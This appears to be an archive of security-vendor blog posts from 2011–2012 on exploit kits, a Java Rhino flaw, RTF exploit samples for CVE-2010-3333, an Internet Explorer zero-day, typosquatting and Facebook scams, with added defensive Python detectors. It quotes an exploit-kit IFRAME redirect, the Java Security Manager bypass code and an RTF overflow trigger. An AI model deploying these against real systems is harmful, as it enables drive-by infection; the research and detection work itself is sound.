Archive for the ‘Cybercrime’ Category


Massive Compromise of WordPress-based Sites but ‘Everything will be Fine’

By Daniel Chechik  •  January 30th, 2012  •   Cybercrime Malware
A few days ago, hundreds of websites based on WordPress 3.2.1 were compromised. The attacker uploaded an HTML page to the standard Uploads folder, and that page redirects the user to the Phoenix Exploit Kit. The kit's logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites:
Partial list of compromised WordPress websites
The content uploaded by the attacker is not part of the home page and does not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites other than the uploaded page will not infect the user's machine. The general motivation for attackers to compromise legitimate websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies.
In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link, as described on the Websense blog. The link points to the aforementioned uploaded page.
The malicious uploaded page

The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:
<IFRAME style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px" src="hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php" frameborder="0"></IFRAME>

The exploit page is hosted on a Russian domain, horoshovsebudet, which roughly translates as "Everything will be fine", showing a certain sense of humor by these attackers.
The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:

The obfuscated Phoenix exploit page

The obfuscated page above generates code that attempts to exploit multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java, as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability, as shown in the following screenshot taken from the original malicious server.

Statistics on Phoenix Exploit Kit control panel

Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability.  Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer.

Interestingly enough, the "Browser statistics" chart in the screenshot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that the Chrome browser is explicitly excluded, for no obvious reason:

Phoenix Exploit Kit source code

All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked.

As usual, stay safe and be careful not to click links in suspicious emails.



Prevalent Exploit Kits Updated with a New Java Exploit

By Daniel Chechik  •  December 16th, 2011  •   Cybercrime Malware Vulnerabilities

Until recently, most of the vulnerabilities exploited by popular exploit kits had been discovered last year or even earlier. Moreover, it would take authors at least a month to update their kits with new exploits that had been discovered in the wild. However, in the past few weeks, authors released updated versions of their kits with a recent exploit before a patch had been released.

First, a new version of the Blackhole exploit kit was released, version 1.2.1:

Live Blackhole Exploit Kit control panel

The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.
A few days later, a new version of the Phoenix exploit kit, 3.0, was released, just a few weeks after the release of its predecessor, Phoenix 2.9.

Live Phoenix Exploit Kit 3.0 control panel

Notice the red boxes in the screenshots above: a new exploit was added to these exploit kits, which is the reason for the upgrade.

A few weeks ago Michael 'mihi' Schierl described a design error in Java. Basically, this vulnerability is similar to other Java vulnerabilities where untrusted code is executed with elevated privileges. Rhino is a JavaScript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine's protection by generating an error object from a Rhino script; the object runs with elevated privileges and executes code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.

Not long after the discovery, an exploit module was published in Metasploit. First, the code binds the applet into a Rhino script context:

import javax.script.*;

ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings b = engine.createBindings();
b.put("applet", this);

The Java code then evaluates a script that bypasses the Security Manager protection by overriding the "toString" method inside the script context:

Object proxy = (Object) engine.eval(
    "this.toString = function() {" +
    "    java.lang.System.setSecurityManager(null);" +
    "    applet.callBack();" +
    "    return String.fromCharCode(97 + Math.round(Math.random() * 25));" +
    "};" +
    "e = new Error();" +
    "e.message = this;" +
    "e", b);

The script throws an exception, which the applet catches, and the rest of the code is then executed:

catch (ScriptException e) {
e.printStackTrace();
}

The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective and therefore authors of exploit kits rushed to add it to their kits. The concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.

Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.

We highly encourage users to keep their Java updated, or remove it if it is not needed. A patch for this Java vulnerability is available by now: Look for Java 6 Update 29, or Java 7 Update 1.



Typosquatters exploit misspelled variations of YouTube.com domain name

By Rodel Mendrez  •  September 8th, 2011  •   Cybercrime

Here is a scenario that may sound familiar to you. You were in front of your computer one night and decided to watch some YouTube clips. So you opened your favourite browser and, because you have clumsy fingers, instead of typing "YouTube.com" in the address bar you entered "YoutTube.com". A second later a Web page loads, but instead of YouTube's homepage, the page redirects you to an online survey. You are confused and didn't expect this webpage, but since the website looks like the real YouTube site, and you get a chance to win an awesome MacBook Air, iPhone 4 or iPad 2, you decide to take the plunge anyway.


Welcome to typosquatting. Typosquatting is a form of cybersquatting where someone registers an intentionally misspelled domain name which is nearly identical to the target’s brand name and takes advantage of users who mistakenly enter misspelled domain names. Typosquatting is not a new phenomenon but it is widespread. Only last week the folks at OpenDNS observed a typosquatting scam driven off Twitter’s domain.

In our YouTube example, traffic is redirected to the “online survey” website videorewardsonline.com when the user enters YoutTube.com. According to Alexa.com, the domain videorewardsonline.com was only created on August 24 and has had a rapid spike in traffic with a 29% increase in the percentage of global page views. We believe this spike was due to users being redirected by typosquatted domain names.

We have found the following misspelled variations of the "YouTube" domain redirecting either to a "survey" website or to an online dating website.

Yotube.com

Yutube.com

Yuube.com

Youtbe.com

Youtue.com

Youtub.com

Youube.com

Tubeyou.com

Yutbe.com

Outube.com

Yotub.com

Yutub.com

Youtbue.com

Youttube.com

Yyoutube.com
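The list above mixes several distinct typo classes: a dropped letter (Yotube), a doubled letter (Youttube), two adjacent letters swapped (Youtbue), two dropped letters (Yuube), and one word swap (Tubeyou) that no keystroke model covers. The following is an added example, written for this page and not taken from the original post, that generates those classes for a brand's second-level label and classifies each observed domain; a defender can run the same generator over their own brand to decide which variants to register or monitor. The OBSERVED list is copied from the post; the choice of which keystroke errors to model is an assumption.

```python
from collections import Counter
from itertools import combinations

# Misspelled domains reported in the post above.
OBSERVED = [
    "Yotube.com", "Yutube.com", "Yuube.com", "Youtbe.com", "Youtue.com",
    "Youtub.com", "Youube.com", "Tubeyou.com", "Yutbe.com", "Outube.com",
    "Yotub.com", "Yutub.com", "Youtbue.com", "Youttube.com", "Yyoutube.com",
]

# Typo classes modelled here (an assumption about common keystroke errors):
# one dropped letter, one doubled letter, two adjacent letters swapped, and
# two dropped letters.
CLASSES = ("omission", "duplication", "transposition", "double_omission")


def typo_variants(brand: str) -> dict:
    """Return {class: set(variant labels)} for the brand's second-level label."""
    name = brand.lower()
    n = len(name)
    v = {c: set() for c in CLASSES}
    for i in range(n):
        v["omission"].add(name[:i] + name[i + 1:])
        v["duplication"].add(name[:i] + name[i] + name[i:])
    for i in range(n - 1):
        if name[i] != name[i + 1]:  # swapping identical letters changes nothing
            v["transposition"].add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    for i, j in combinations(range(n), 2):
        v["double_omission"].add(name[:i] + name[i + 1:j] + name[j + 1:])
    return v


def classify(domain: str, brand: str) -> str:
    """Name the typo class a domain's label falls into, or 'other'."""
    label = domain.lower().split(".")[0]  # ignore the TLD
    if label == brand.lower():
        return "exact"
    variants = typo_variants(brand)
    for cls in CLASSES:
        if label in variants[cls]:
            return cls
    return "other"


def summarize(domains, brand: str) -> Counter:
    """Count how many observed domains fall into each typo class."""
    return Counter(classify(d, brand) for d in domains)


if __name__ == "__main__":
    for d in OBSERVED:
        print(f"{d:14} {classify(d, 'youtube')}")
    print(summarize(OBSERVED, "youtube"))
```

Of the fifteen observed domains, seven are single omissions, four are double omissions, two are duplications and one is a transposition; only Tubeyou.com falls outside these classes. The generator deliberately ignores the TLD, since the scam here reuses .com throughout.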

The survey website also serves localized versions of itself. It uses IP address geolocation to appear more convincing. In the screenshot below, a German webpage is shown if you are located in Germany.

At first glance, the survey website looks rather harmless. However, in order to participate and “win” prizes it requires entering your email and mobile number. At this point you may feel that this is starting to look somewhat dodgy.


However, the worst part comes after you enter your mobile number. The screenshot below shows that the main purpose of the "survey" is to convince people to subscribe to an auto-renewing SMS subscription service, which is charged to the user's phone bill.


You can clearly see how the people behind this typosquatting scam take advantage of an organization's strong visual brand to trick unsuspecting users into parting with their personal information. In this case, by imitating YouTube's look and feel, the scammers piggyback on that brand's trust to make the "rewards" seem genuine.

Be careful what you type in your browser’s address bar, and always read the fine print to avoid being scammed.




Resurrection of CVE-2010-3333 In-The-Wild

By Yaniv Miron  •  July 5th, 2011  •   Cybercrime

During the last few weeks we have seen massive use of the CVE-2010-3333 vulnerability in Microsoft Office. This eight-month-old vulnerability is used in documents such as one that pretends to be "President Obama's Speech".

Microsoft Office vulnerabilities have become very popular over the last few years; here are several samples found In-The-Wild that use MS10-087 / CVE-2010-3333.

A brief overview of the vulnerability can be found at MITRE under CVE-2010-3333:

“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka ‘RTF Stack Buffer Overflow Vulnerability.’”

As we can see, there is an exploit for it in the Metasploit exploit framework:


Figure 1 – Metasploit main page

The vulnerability is actually in the .RTF file format, but it can be triggered using a .DOC file (not an actual .DOC file, but an RTF file with a .DOC extension).

Figure 2 – Part of the exploit from Metasploit


CVE-2010-3333 Sample Analysis

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

The following analysis was performed via Word 2003.

Here is the text view of the file; it clearly shows that they are using CVE-2010-3333:

Figure 3 – Text view of CVE-2010-3333 sample

Let's examine the hex view of the file:

Figure 4 – Hex view of CVE-2010-3333 sample


Now, let’s examine the beginning of the file:

{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1000000…[SNIP]…0;01234567ff000…[SNIP]…

From Microsoft Office Word 2003 Rich Text Format (RTF) Specification:

“Drawing Object Properties

The bulk of a drawing object is defined as a series of properties. The {\shp control word is followed by {\*\shpinst. Following the {\*\shpinst is a list of all the properties of a shape. Each of the properties is in the following format:

{ \sp  { \sn PropertyName } { \sv PropertyValueInformation } }

The control word for the drawing object property is \sp. Each property has a pairing of the name (\sn) and value (\sv) control words placed in the shape property group.”

We see that it is an .RTF file containing an \sn control word (the property-name control word, per the spec quoted above) with the PropertyName "pFragments" (fragments are optional, additional parts of the shape; they allow the shape to contain multiple paths and parts, and this property lists the fragments of the shape). After that, we see an \sv that contains a value, a semicolon, a second value, a second semicolon and a third value. The third value is the cause of the buffer overflow.

Now that we’ve seen that hackers use the vulnerability In-The-Wild, let’s try and get a better understanding of the vulnerability by using the Metasploit sample:

{\rtf1{\shp{\sp{\sn pFragments}{\sv 5;6;11111111acc8111…[SNIP]…
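Both the in-the-wild sample and the Metasploit sample above carry the same shape: a {\sp{\sn pFragments}{\sv ...}} group whose \sv value is two numbers and a hex blob separated by semicolons. Below is an added example, written for this page rather than taken from the post or any M86 product, of a small Python triage check that parses that structure out of an RTF file and flags a pFragments property whose third field is not hex or is implausibly long. The regular expression, the three-field expectation, the size threshold and the two constructed documents are assumptions for illustration (the constructed "oversized" document is just a run of zero bytes, not an exploit).

```python
import re

# One shape-property group, {\sp{\sn NAME}{\sv VALUE}}, laid out as in the RTF
# spec excerpt quoted above. The \sv value may be wrapped across RTF lines, so
# everything up to the closing brace is captured and whitespace removed later.
_SHAPE_PROP_RE = re.compile(
    r"\{\\sp\s*\{\\sn\s+(?P<name>[A-Za-z0-9]+)\s*\}\s*\{\\sv\s*(?P<value>[^}]*)\}",
    re.DOTALL,
)

# Assumed heuristic threshold (not from the post or the spec): benign fragment
# lists are short, so a hex payload longer than this many characters is flagged.
MAX_FRAGMENT_HEX_CHARS = 256


def shape_properties(rtf: str):
    """Return [(name, value), ...] for every shape property group in the RTF."""
    return [(m.group("name"), m.group("value")) for m in _SHAPE_PROP_RE.finditer(rtf)]


def inspect_pfragments(rtf: str):
    """Inspect every pFragments property and report why it looks suspicious.

    The value is "a;b;hexdata" (three semicolon-separated fields, as in both
    samples in the post); the third field is the one that triggers the bug.
    """
    findings = []
    for name, value in shape_properties(rtf):
        if name.lower() != "pfragments":
            continue
        fields = [re.sub(r"\s+", "", f) for f in value.split(";")]
        hex_data = fields[2] if len(fields) >= 3 else ""
        reasons = []
        if len(fields) != 3:
            reasons.append(f"expected 3 fields, got {len(fields)}")
        if not all(f.isdigit() for f in fields[:2]):
            reasons.append("non-numeric size fields")
        if not re.fullmatch(r"[0-9A-Fa-f]*", hex_data):
            reasons.append("third field is not hex")
        if len(hex_data) > MAX_FRAGMENT_HEX_CHARS:
            reasons.append(f"fragment data is {len(hex_data)} hex chars")
        findings.append({
            "fields": len(fields),
            "hex_len": len(hex_data),
            "suspicious": bool(reasons),
            "reasons": reasons,
        })
    return findings


# Constructed test documents (not the in-the-wild samples): a small benign
# fragment list, and one carrying an oversized blob of zero bytes.
BENIGN_RTF = r"{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;8;0001000200030004}}}}}"
OVERSIZED_RTF = (
    r"{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 5;6;" + "00" * 400 + "}}}}}"
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_RTF), ("oversized", OVERSIZED_RTF)):
        for finding in inspect_pfragments(doc):
            print(label, finding)
```

This is a triage aid, not a parser of the full RTF grammar: it finds the property group regardless of whether \*\shpinst is present (the Metasploit sample omits it), and it reports every reason a property was flagged so the analyst can see whether the trigger was a malformed field or simply the size.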


ASM Info:

30e9eb72 81e1ffff0000    and     ecx,0FFFFh
30e9eb78 56              push    esi
30e9eb79 8bf1            mov     esi,ecx
30e9eb7b 0faf742414      imul    esi,dword ptr [esp+14h]
30e9eb80 037010          add     esi,dword ptr [eax+10h]
30e9eb83 8bc1            mov     eax,ecx
30e9eb85 c1e902          shr     ecx,2
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi] ; Overflow!
30e9eb8a 8bc8            mov     ecx,eax
30e9eb8c 83e103          and     ecx,3
30e9eb8f f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
30e9eb91 5e              pop     esi
30e9eb92 5f              pop     edi
30e9eb93 c20c00          ret     0Ch


Debugger info:

(100.3f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=00000023 edx=00000000 esi=025dc82c edi=00130000
eip=30e9eb88 esp=001237b8 ebp=001237f0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
...[SNIP]...
mso!Ordinal6426+0x64d:
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]


In-The-Wild Samples

Here are a few of the samples that we have found:

File Name: 2011 Insider’s Guide to Military Benefits .doc

MD5: f520c8671ddb9965bbf541f20635ef30

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

File Name: Q and A.doc

MD5: 46863c6078905dab6fd9c2a480e30ad0

The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers.

These types of attacks are blocked by M86 Security’s Secure Web Gateway solution.



0-day exploit used in a targeted attack – CVE-2011-1255

By Avri Schneider  •  June 26th, 2011  •   Cybercrime Malware Vulnerabilities

Time Element Memory Corruption, a remote code execution vulnerability recently patched by Microsoft as part of MS11-050 and bearing the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255, is being actively exploited in the wild.

The M86 Security Labs team was contacted and asked to inspect the URL of a legitimate website belonging to a large private company, which had been blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.

We were asked to investigate if it was indeed a malicious page or a case of Over-Blocking.

The page looked benign, but on inspecting each included JavaScript file we saw that one of them was injecting an iframe pointing to a malicious page, which was very easily classified as malicious because shellcode patterns were part of the page's DOM:

So, just another infected site, big deal, right? But after further inspection we saw that it exploited an unpublished security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest fully patched version of IE and saw a crash followed by execution of malicious code.

You can imagine the excitement on the team – finding a 0-day in the wild!

The excitement of finding a 0-day in the wild didn’t last that long, since soon after, Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a high level of certainty that the anonymous researcher who, according to Microsoft's security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, had used the vulnerability details for malicious purposes as part of targeted attacks.

We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack for the well-known iepeers.dll vulnerability exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patched by Microsoft’s MS10-018 security patch for Internet Explorer on 30.3.10.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he is serving his malicious code.

Remember the code snippet shown above, showing how the attacker hid the shellcode as part of the DOM?

Hiding data in the DOM of the page is a good obfuscation technique: it bypasses security software that does not act as an actual browser and whose script engine does not have access to the actual DOM.

It turns out that one of the side-effects of hiding data inside DIV elements is that it makes the data indexable by search engines.
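The off-screen IFRAME in the WordPress post at the top of this page and the shellcode stashed in DIV elements described here are both artifacts that can be found with a static pass over the HTML, even when no script engine runs. The following is an added example, written for this page and not M86's or any product's code, of a small Python scanner that walks the markup with the standard-library HTML parser, records iframes whose inline style collapses or off-screens them, and records long %u-escape or hex runs in text nodes along with the element that holds them. The hiddenness heuristic, the "shellcode-like" pattern, the void-tag list and the constructed SAMPLE_HTML page are assumptions for illustration; the IFRAME line in the sample is the one quoted in the WordPress post, and the blob in the hidden DIV is a constructed run of %u9090 escapes, not real shellcode.

```python
import re
from html.parser import HTMLParser

# Heuristics are assumptions for this example, not rules from the posts:
# an element is "hidden" if its inline style collapses it or pushes it far
# off-screen (the IFRAME in the WordPress post does both), and a text run is
# "shellcode-like" if it is a long chain of %uXXXX escapes or of hex digits.
_HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0(?:px)?\b"
    r"|(?:left|right|top|bottom)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)
_SHELLCODE_BLOB = re.compile(r"(?:%u[0-9a-f]{4}){16,}|[0-9a-f]{64,}", re.IGNORECASE)
_VOID_TAGS = {"br", "img", "input", "meta", "link", "hr", "area", "base", "col", "source"}


class SuspiciousDomScanner(HTMLParser):
    """Collect hidden iframes and shellcode-like text blobs while parsing."""

    def __init__(self):
        super().__init__()
        self.hidden_iframes = []
        self.shellcode_hits = []
        self._stack = []  # (tag, is_hidden) for the currently open elements

    @staticmethod
    def _is_hidden(attrs):
        return (bool(_HIDDEN_STYLE.search(attrs.get("style", "")))
                or attrs.get("width") == "0" or attrs.get("height") == "0")

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        hidden = self._is_hidden(a)
        if tag == "iframe" and hidden:
            self.hidden_iframes.append({"src": a.get("src", ""), "style": a.get("style", "")})
        if tag not in _VOID_TAGS:
            self._stack.append((tag, hidden))

    def handle_endtag(self, tag):
        if self._stack and self._stack[-1][0] == tag:
            self._stack.pop()

    def handle_data(self, data):
        text = re.sub(r"\s+", "", data)  # blobs are often wrapped across lines
        tag, hidden = self._stack[-1] if self._stack else ("", False)
        for m in _SHELLCODE_BLOB.finditer(text):
            self.shellcode_hits.append(
                {"element": tag, "hidden": hidden, "length": len(m.group(0)),
                 "sample": m.group(0)[:24]})


def scan_html(html: str) -> dict:
    """Parse one HTML document and return the two finding lists."""
    scanner = SuspiciousDomScanner()
    scanner.feed(html)
    scanner.close()
    return {"hidden_iframes": scanner.hidden_iframes,
            "shellcode_hits": scanner.shellcode_hits}


# Constructed page: a normal paragraph and a visible embed, the off-screen
# IFRAME quoted in the WordPress post, and a hidden DIV holding a constructed
# run of %u9090 escapes standing in for a shellcode blob.
SAMPLE_HTML = (
    "<html><body>\n"
    "<p>Welcome to our site.</p>\n"
    '<iframe src="https://example.org/embed" width="640" height="360"></iframe>\n'
    '<IFRAME style="RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px" '
    'src="hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php" frameborder="0"></IFRAME>\n'
    '<div id="payload" style="display:none">' + "%u9090" * 20 + "</div>\n"
    "</body></html>"
)

if __name__ == "__main__":
    from pprint import pprint
    pprint(scan_html(SAMPLE_HTML))
```

Because the scanner reports the containing element and whether that element is hidden, a hit inside a hidden DIV ranks above one inside a visible script block, which is the ordering an analyst wants when triaging a suspected injection. The same text-node pass is what makes the search-engine observation above work: the blob is plain text to any indexer, so it is plain text to this scanner too.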

Google searching the pattern “TTu0d0f[...snip...]d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.

Here is the list of the infected sites according to Google’s search result:

Google even caches samples for us; it is ironic that an attacker's obfuscation technique can be turned against him to find his infection servers with a simple Google search. :)



Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik  •  June 4th, 2011  •   Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really usable, as it required activation by the author of the exploit kit: it contains an activation page that is used to load all the exploits onto the server for each specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit's Kit 2.7 logo

The changes between the two versions are minor, but still very important as most exploits become inefficient in the very short term, especially with the latest IE vulnerabilities.




Facebook Scam Spreading: ‘Hey, I just made a photoshop of you, check it out’

By Satnam Narang  •  April 4th, 2011  •   Cybercrime

We have been monitoring a new Facebook scam that is spreading via Facebook Chat messages. This particular scam usually begins with a chat message from a friend like the one below:

Example of the Facebook Chat message

Once a user clicks on the link, they are redirected via the site used in this campaign (hxxp://millium.co.cc) to a Facebook Application installation window.




k0desploit Exploit Kit and Stolen Credit Cards Discovered

By Avri Schneider  •  March 9th, 2011  •   Cybercrime

During our investigative research into existing and emerging threats, we tend to make new discoveries.  One of the most recent cases involved the discovery of a new toolkit:

k0de Sploit Pack

The phrase at the bottom of the page ("K0de.org Open Source Exploits") caught our attention, as we wondered how 'open-source' this toolkit really was. A quick Google search led us to the third result:

Leaked Message from Exploit Kit Author

The post (or 'paste', to use Pastie.org's terminology) contained a leaked message written by the toolkit author on a private hacker forum. It reveals that this new toolkit is just a clone of the popular Eleonore with various improvements:

“As you can see it’s pretty much elenores lay out with a few touch ups & very badly made paint buttons. I’ve only been working on this for 2 hours or so, so please keep that in mind and I plan to add a lot more onto it in the coming days, so keep an eye out for news.”

The author was nice enough to provide us with interesting statistics from his own research:

“Now then, I’ve tested this on 1,000 unique hits from windows PC’s only (Xp, Vista & Win7 only) and I achieved 96 infections from it, that means the rough infection rate is at 9.6%, that is a 3.5% rise from the great Elenore mod posted by Blackdevil. Most of the infections was from MDAC & the IE kit.”

The author then calls upon fellow malware authors for their help with updating the exploits to ‘fix’ the rise in detection rate of the malicious iframe.  Also, the author lists some of the modifications he has made in this toolkit:

“Since I have tested it, the detection of the iframe has risen a lot, so in order to conduct a good test, someone will have to UD the exploits again.

I have also slightly fixed up the chrome & firefox exploits, I’m not 100% sure but they seem to be hitting at least, whereas they used to do nothing.”

In addition to the “open-source” exploit kit, the page contains a long list of anonymous proxy servers near the bottom as well as stolen credit card numbers along with the login credentials of dozens of individuals.

Here's a screenshot of what it looked like:

Screenshot of Stolen Credentials including CC#'s

We have confirmed that, after we notified them, both Google and pastie.org removed the illegal content before this blog post was published.



More Likejacking: This Guy Took A Picture Of His Face Everyday For 8 Years

By Satnam Narang  •  March 4th, 2011  •   Cybercrime

Since posting about the Justin Bieber likejacking campaign, we have observed similar campaigns cropping up.

Apparently, This Guy Took A Picture Of His Face Every Day For 8 Years

Most recent and notable is a new campaign which purports to showcase a time-lapse video of a man who took a picture of his face every day for 8 years. From the power of celebrity to outrageous and shocking headlines, scammers have managed to strike the right chord for luring in users. This particular version shows just how successful they are.




Can’t Believe A Girl Did This Because of Justin Bieber? You Shouldn’t

By Satnam Narang  •  February 28th, 2011  •   Cybercrime

We are currently monitoring a Facebook “likejacking” scam that is similar to previous campaigns that were first observed in 2010.

Justin Bieber Likejacking Scam Spreads on Facebook

“Likejacking” is a term that is specifically used to refer to a “clickjack” that leads to an end user unknowingly “liking” a website via the social network, Facebook.  By tricking users into liking the page, a post is published to their Facebook walls and can be viewed by their friends and family.

